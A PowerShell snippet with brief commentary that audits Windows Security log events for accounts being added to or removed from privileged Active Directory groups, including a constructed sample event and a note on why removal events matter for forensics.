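$PrivilegedGroups = @('Domain Admins', 'Enterprise Admins', 'Schema Admins', 'Administrators',
                      'Account Operators', 'Backup Operators', 'Server Operators', 'DnsAdmins')

$MembershipEventId = @{
    4728 = 'Added to global group';     4729 = 'Removed from global group'
    4732 = 'Added to local group';      4733 = 'Removed from local group'
    4756 = 'Added to universal group';  4757 = 'Removed from universal group'
}

function ConvertFrom-GroupMembershipEvent {
    param([Parameter(Mandatory)][int]$Id, [Parameter(Mandatory)][xml]$EventXml)
    $d = @{}
    $EventXml.Event.EventData.Data | ForEach-Object { $d[$_.Name] = $_.'#text' }
    [pscustomobject]@{
        Action    = $MembershipEventId[$Id]
        Group     = "$($d['TargetDomainName'])\$($d['TargetUserName'])"
        # MemberName is the member's distinguished name; local-group events often carry only the SID
        Member    = if ($d['MemberName'] -and $d['MemberName'] -ne '-') { $d['MemberName'] } else { $d['MemberSid'] }
        ChangedBy = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
    }
}

function Get-PrivilegedGroupChange {
    param([datetime]$Since = (Get-Date).AddDays(-7), [string[]]$Groups = $PrivilegedGroups)
    $ids = @($MembershipEventId.Keys)
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = $ids; StartTime = $Since } -ErrorAction SilentlyContinue |
        ForEach-Object {
            ConvertFrom-GroupMembershipEvent -Id $_.Id -EventXml ([xml]$_.ToXml()) |
                Add-Member -NotePropertyName Time -NotePropertyValue $_.TimeCreated -PassThru
        } |
        Where-Object { ($_.Group -split '\\')[-1] -in $Groups }
}

# Constructed sample (not a real event): a help desk account adds a user to Domain Admins.
$sampleXml = [xml]@'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4728</EventID></System>
  <EventData>
    <Data Name="MemberName">CN=J. Doe,OU=Staff,DC=corp,DC=example</Data>
    <Data Name="MemberSid">S-1-5-21-1-2-3-1105</Data>
    <Data Name="TargetUserName">Domain Admins</Data>
    <Data Name="TargetDomainName">CORP</Data>
    <Data Name="TargetSid">S-1-5-21-1-2-3-512</Data>
    <Data Name="SubjectUserSid">S-1-5-21-1-2-3-2201</Data>
    <Data Name="SubjectUserName">helpdesk7</Data>
    <Data Name="SubjectDomainName">CORP</Data>
    <Data Name="SubjectLogonId">0x5a7c3</Data>
    <Data Name="PrivilegeList">-</Data>
  </EventData>
</Event>
'@
ConvertFrom-GroupMembershipEvent -Id 4728 -EventXml $sampleXml | Format-List
# Live, run on (or against forwarded events from) every domain controller:
# Get-PrivilegedGroupChange -Since (Get-Date).AddDays(-7) | Format-Table -AutoSize
```

Including the remove events matters for forensics: an attacker who adds an account to Domain Admins, uses it, and removes it again leaves an add/remove pair that a query for additions alone will show, but only the pair tells you the window of exposure.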